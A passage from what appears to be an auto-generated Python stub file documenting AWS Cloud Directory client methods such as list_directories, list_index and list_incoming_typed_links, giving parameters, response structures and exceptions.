:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_schema_as_json(SchemaArn=None):
"""
Retrieves a JSON representation of the schema. See JSON Schema Format for more information.
See also: AWS API Documentation
Exceptions
:example: response = client.get_schema_as_json(
SchemaArn='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe ARN of the schema to retrieve.\n
:rtype: dict
ReturnsResponse Syntax{
'Name': 'string',
'Document': 'string'
}
Response Structure
(dict) --
Name (string) --The name of the retrieved schema.
Document (string) --The JSON representation of the schema document.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.ValidationException
:return: {
'Name': 'string',
'Document': 'string'
}
"""
pass
def get_typed_link_facet_information(SchemaArn=None, Name=None):
"""
Returns the identity attribute order for a specific TypedLinkFacet . For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.get_typed_link_facet_information(
SchemaArn='string',
Name='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe unique name of the typed link facet.\n
:rtype: dict
ReturnsResponse Syntax
{
'IdentityAttributeOrder': [
'string',
]
}
Response Structure
(dict) --
IdentityAttributeOrder (list) --
The order of identity attributes for the facet, from most significant to least significant. The ability to filter typed links considers the order that the attributes are defined on the typed link facet. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range. Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls. For more information about identity attributes, see Typed Links .
(string) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.FacetNotFoundException
:return: {
'IdentityAttributeOrder': [
'string',
]
}
:returns:
(string) --
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_applied_schema_arns(DirectoryArn=None, SchemaArn=None, NextToken=None, MaxResults=None):
"""
Lists schema major versions applied to a directory. If SchemaArn is provided, lists the minor version.
See also: AWS API Documentation
Exceptions
:example: response = client.list_applied_schema_arns(
DirectoryArn='string',
SchemaArn='string',
NextToken='string',
MaxResults=123
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory you are listing.\n
:type SchemaArn: string
:param SchemaArn: The response for ListAppliedSchemaArns when this parameter is used will list all minor version ARNs for a major version.
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
SchemaArns (list) --
The ARNs of schemas that are applied to the directory.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_attached_indices(DirectoryArn=None, TargetReference=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Lists indices attached to the specified object.
See also: AWS API Documentation
Exceptions
:example: response = client.list_attached_indices(
DirectoryArn='string',
TargetReference={
'Selector': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory.\n
:type TargetReference: dict
:param TargetReference: [REQUIRED]\nA reference to the object that has indices attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level to use for this operation.
:rtype: dict
ReturnsResponse Syntax
{
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
IndexAttachments (list) --
The indices attached to the specified object.
(dict) --
Represents an index and an attached object.
IndexedAttributes (list) --
The indexed attribute values.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ObjectIdentifier (string) --
In response to ListIndex , the ObjectIdentifier of the object attached to the index. In response to ListAttachedIndices , the ObjectIdentifier of the index attached to the object. This field will always contain the ObjectIdentifier of the object on the opposite side of the attachment specified in the query.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
"""
pass
def list_development_schema_arns(NextToken=None, MaxResults=None):
"""
Retrieves each Amazon Resource Name (ARN) of schemas in the development state.
See also: AWS API Documentation
Exceptions
:example: response = client.list_development_schema_arns(
NextToken='string',
MaxResults=123
)
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
SchemaArns (list) --
The ARNs of retrieved development schemas.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'SchemaArns': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_directories(NextToken=None, MaxResults=None, state=None):
"""
Lists directories created within an account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_directories(
NextToken='string',
MaxResults=123,
state='ENABLED'|'DISABLED'|'DELETED'
)
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:type state: string
:param state: The state of the directories in the list. Can be either Enabled, Disabled, or Deleted.
:rtype: dict
ReturnsResponse Syntax
{
'Directories': [
{
'Name': 'string',
'DirectoryArn': 'string',
'State': 'ENABLED'|'DISABLED'|'DELETED',
'CreationDateTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Directories (list) --
Lists all directories that are associated with your account in pagination fashion.
(dict) --
Directory structure that includes the directory name and directory ARN.
Name (string) --
The name of the directory.
DirectoryArn (string) --
The Amazon Resource Name (ARN) that is associated with the directory. For more information, see arns .
State (string) --
The state of the directory. Can be either Enabled , Disabled , or Deleted .
CreationDateTime (datetime) --
The date and time when the directory was created.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'Directories': [
{
'Name': 'string',
'DirectoryArn': 'string',
'State': 'ENABLED'|'DISABLED'|'DELETED',
'CreationDateTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.InvalidNextTokenException
"""
pass
def list_facet_attributes(SchemaArn=None, Name=None, NextToken=None, MaxResults=None):
"""
Retrieves attributes attached to the facet.
See also: AWS API Documentation
Exceptions
:example: response = client.list_facet_attributes(
SchemaArn='string',
Name='string',
NextToken='string',
MaxResults=123
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe ARN of the schema where the facet resides.\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the facet whose attributes will be retrieved.\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'Attributes': [
{
'Name': 'string',
'AttributeDefinition': {
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
}
},
'AttributeReference': {
'TargetFacetName': 'string',
'TargetAttributeName': 'string'
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Attributes (list) --
The attributes attached to the facet.
(dict) --
An attribute that is associated with the Facet .
Name (string) --
The name of the facet attribute.
AttributeDefinition (dict) --
A facet attribute consists of either a definition or a reference. This structure contains the attribute definition. See Attribute References for more information.
Type (string) --
The type of the attribute.
DefaultValue (dict) --
The default value of the attribute (if configured).
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
IsImmutable (boolean) --
Whether the attribute is mutable or not.
Rules (dict) --
Validation rules attached to the attribute definition.
(string) --
(dict) --
Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.
Type (string) --
The type of attribute validation rule.
Parameters (dict) --
The minimum and maximum parameters that are associated with the rule.
(string) --
(string) --
AttributeReference (dict) --
An attribute reference that is associated with the attribute. See Attribute References for more information.
TargetFacetName (string) --
The target facet name that is associated with the facet reference. See Attribute References for more information.
TargetAttributeName (string) --
The target attribute name that is associated with the facet reference. See Attribute References for more information.
RequiredBehavior (string) --
The required behavior of the FacetAttribute .
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'Attributes': [
{
'Name': 'string',
'AttributeDefinition': {
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
}
},
'AttributeReference': {
'TargetFacetName': 'string',
'TargetAttributeName': 'string'
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
],
'NextToken': 'string'
}
:returns:
(string) --
(string) --
"""
pass
def list_facet_names(SchemaArn=None, NextToken=None, MaxResults=None):
"""
Retrieves the names of facets that exist in a schema.
See also: AWS API Documentation
Exceptions
:example: response = client.list_facet_names(
SchemaArn='string',
NextToken='string',
MaxResults=123
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) to retrieve facet names from.\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:rtype: dict
ReturnsResponse Syntax
{
'FacetNames': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
FacetNames (list) --
The names of facets that exist within the schema.
(string) --
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
:return: {
'FacetNames': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_incoming_typed_links(DirectoryArn=None, ObjectReference=None, FilterAttributeRanges=None, FilterTypedLink=None, NextToken=None, MaxResults=None, ConsistencyLevel=None):
"""
Returns a paginated list of all the incoming TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.list_incoming_typed_links(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
},
FilterAttributeRanges=[
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
FilterTypedLink={
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
NextToken='string',
MaxResults=123,
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where you want to list the typed links.\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nReference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type FilterAttributeRanges: list
:param FilterAttributeRanges: Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type FilterTypedLink: dict
:param FilterTypedLink: Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n
:type NextToken: string
:param NextToken: The pagination token.
:type MaxResults: integer
:param MaxResults: The maximum number of results to retrieve.
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level to execute the request at.
:rtype: dict
ReturnsResponse Syntax
{
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LinkSpecifiers (list) --
Returns one or more typed link specifiers as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def list_index(DirectoryArn=None, RangesOnIndexedValues=None, IndexReference=None, MaxResults=None, NextToken=None, ConsistencyLevel=None):
"""
Lists objects attached to the specified index.
See also: AWS API Documentation
Exceptions
:example: response = client.list_index(
DirectoryArn='string',
RangesOnIndexedValues=[
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
IndexReference={
'Selector': 'string'
},
MaxResults=123,
NextToken='string',
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory that the index exists in.\n
:type RangesOnIndexedValues: list
:param RangesOnIndexedValues: Specifies the ranges of indexed values that you want to query.\n\n(dict) --A range of attributes.\n\nAttributeKey (dict) --The key of the attribute that the attribute range covers.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nRange (dict) --The range of attribute values being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n
:type IndexReference: dict
:param IndexReference: [REQUIRED]\nThe reference to the index to list.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of objects in a single page to retrieve from the index during a request. For more information, see Amazon Cloud Directory Limits .
:type NextToken: string
:param NextToken: The pagination token.
:type ConsistencyLevel: string
:param ConsistencyLevel: The consistency level to execute the request at.
:rtype: dict
ReturnsResponse Syntax
{
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
IndexAttachments (list) --
The objects and indexed values attached to the index.
(dict) --
Represents an index and an attached object.
IndexedAttributes (list) --
The indexed attribute values.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ObjectIdentifier (string) --
In response to ListIndex , the ObjectIdentifier of the object attached to the index. In response to ListAttachedIndices , the ObjectIdentifier of the index attached to the object. This field will always contain the ObjectIdentifier of the object on the opposite side of the attachment specified in the query.
NextToken (string) --
The pagination token.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotIndexException
:return: {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidNextTokenException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotIndexException
"""
pass
def list_managed_schema_arns(SchemaArn=None, NextToken=None, MaxResults=None):
"""
Lists the major version families of each managed schema. If a major version ARN is provided as SchemaArn, the minor version revisions in that family are listed instead.
See also: AWS API Documentation
Exceptions
:example: response = client.list_managed_schema_arns(
SchemaArn='string',
NextToken='string',
MaxResults=123
)
